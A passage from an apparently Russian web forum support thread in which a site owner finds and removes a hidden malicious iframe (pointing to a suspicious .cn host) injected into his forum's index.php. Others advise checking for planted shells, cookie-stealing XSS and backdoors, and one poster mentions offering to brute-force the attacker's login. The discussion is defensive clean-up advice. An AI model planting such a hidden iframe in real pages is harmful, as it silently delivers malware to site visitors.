[Помощь] Помогите срочно

Статус
В этой теме нельзя размещать новые ответы.
Для просмотра ссылки Войди или Зарегистрируйся


Хотя та конструкция сама по себе не очень правильная, тот кусок кода надо вставлять в конец footer-а шаблона
 
Заменил и форум заработал!
Большое спасибо.
А скажите от чего это произошло и как избежать этого?
P.S a_smith Я Вам благодарен, но вот это я убрал <iframe src="http://litedownloadseek.cn/in.cgi?cocacola22" width=1 height=1 style="visibility: hidden"></iframe>
 
  • Заблокирован
  • #13
chuchea
Тебя ломанули! раз в index.php был вставлен ифрейм... по стандарту его там быть не должно! Задумайся о безопасности!

p.s. да и фрейм вставлял какой-то умелец ))))))))
 
chuchea
Тебя ломанули! раз в index.php был вставлен ифрейм... по стандарту его там быть не должно! Задумайся о безопасности!

p.s. да и фрейм вставлял какой-то умелец ))))))))

Кстате возможно... я внутрь фрейма несмотрел... думал так решить сами чето намудрить ))
ну насчет умельца то ты прав - хотя щас редко кто вручную пишет - скриптом - странно конечно
 
  • Заблокирован
  • #15
послушайте..что ж вы развезли..

1. этот "умелец" повставлял во все индексы на аккаунте iframe
Если там есть другие сайты- смотрите их
2. Заработало- этого мало!
код на партнерку/тдс и тп внедрен в индекс админки, авторизации и тд.
Кроме того возможена и активная хсс - т.е. каждый посетитель (или только админ), авторизуясь отдает свои куки на сниффер
У вас просил переавторизоваться, или сменить пароль скрипт форума?

3. Откуда вы знаете что не залит шелл? и все не повторится?

4. Уродец не сменил даты изменений, правленные им файлы отличаются по дате

5. По хорошему, все файлы нужно слить на локалку, и выполнить сравнение с теми, что должны быть (кроме тех, что изменяются автоматически)
Искать все iframe , eval
Сравнивать размеры файлов, даты, сканировать на наличие backdoor
(вдруг не закриптован)

А вы...
п.с. предлагала желающим сбрутить вход этой..кокаколы, но никто не хочет связываться, и мне влом (сломал пару моих дохлых сайтиков, судя по ссылке)
 
До того как автор не прочтет Для просмотра ссылки Войди или Зарегистрируйся, тема закрывается.

Правила раздела IPB (upd)

3. Используйте только информативное название темы. Постарайтесь чётко изложить Вашу проблему. Чем лучше Вы это сделаете, тем больше шансов получить квалифицированный ответ.

5. Задавая вопрос, удостоверьтесь, что ответа на него нету на официальных форумах поддержки.

6. Темы и сообщения созданные с нарушениями, будут удаляться.

7. Создавая тему, удостоверьтесь что она соответствует правилам форума.

По всем вопросам ко мне в личку.
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху